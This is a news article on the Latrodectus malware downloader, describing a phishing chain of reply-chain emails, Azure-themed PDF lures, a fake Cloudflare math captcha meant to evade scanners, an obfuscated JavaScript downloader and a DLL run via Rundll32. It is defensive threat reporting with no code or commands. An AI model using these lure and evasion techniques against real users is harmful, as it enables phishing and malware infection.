New Latrodectus malware uses Microsoft and Cloudflare themes

A new phishing campaign uses Microsoft Azure and Cloudflare themes as lures to appear legitimate and distribute the newly discovered Latrodectus malware. Based on reports, Latrodectus is a widely spread Windows malware downloader that can function as a backdoor, download additional EXE and DLL payloads and execute commands.

Moreover, the researchers explained that this malware’s distribution and infrastructure are similar to the notorious IcedID modular malware loader. Still, it is unclear whether the threat actors intend to phase out IcedID in favour of Latrodectus despite the newer malware gaining traction among phishing attacks.

Separate research has also spotted that this malware uses various PDF lures and themes, with the most recent campaign evading protection tools by using a fake Cloudflare captcha.

 

Latrodectus malware typically starts its infection process through an email.

 

Threat actors spread the Latrodectus malware through reply-chain phishing emails. This strategy was picked up by perpetrators when they used hacked email addresses to reply with links to malicious attachments or malware.

This campaign begins its infection process with either embedded URLs or PDF attachments, eventually leading to the malware’s installation. The PDFs will have generic names, such as ’04-25-Inv-Doc-339.pdf’, and will portray themselves as documents hosted in the MS Azure cloud that users should download first to view them.

However, once the recipient clicks the ‘Download Document’ button, it will take them to a bogus ‘Cloudflare security check’ that will prompt them to answer a simple math question. Using a captcha will likely prevent email security scanners and sandboxes from readily following the attack chain and delivering the payload to the intended user.

Subsequently, when the user enters the correct answer into the field, the fake Cloudflare captcha will download a JavaScript file. The attackers then obfuscate this downloaded JavaScript script with comments that include a secret function that takes text from comments and then executes the script to download an MSI from a predetermined URL.

Once the MSI installation is done, it will create a DLL called Update _b419643a.dll in the%AppData%\Custom_update folder, which Rundll32.exe then launches. The researchers also explained that attackers will likely assign random file names during installation.

Next, this DLL containing the Latrodectus malware will run quietly in the background while the attack process installs payloads or executes commands. Lastly, a successful Latrodectus malware infection could drop additional viruses and gain early access to business networks, which can result in devastating attacks.

These attacks may result in a more extensive range of malware in the future, such as Cobalt Strike, and strong relationships with other ransomware gangs. Therefore, if a device becomes infected with Latrodectus, it is vital to shut down the system as quickly as possible and monitor the network for strange behaviour.